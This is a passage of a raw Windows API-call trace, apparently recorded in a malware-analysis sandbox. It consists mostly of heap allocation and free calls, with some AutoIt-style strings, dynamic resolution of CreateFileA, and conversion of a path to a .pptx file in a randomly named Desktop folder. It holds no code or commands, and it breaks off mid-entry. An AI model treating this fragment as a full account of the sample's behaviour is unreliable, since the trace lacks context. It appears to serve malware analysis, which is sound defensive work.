| out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.527] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.527] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.527] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.528] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.528] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0030.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.531] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.533] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889dd8 [0030.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889dd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.533] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0030.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889dd8 [0030.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889dd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0030.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.534] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0030.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x936008 [0030.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0030.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x51) returned 0x794b90 [0030.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx", cchWideChar=81, lpMultiByteStr=0x794b90, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx", lpUsedDefaultChar=0x0) returned 81 [0030.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 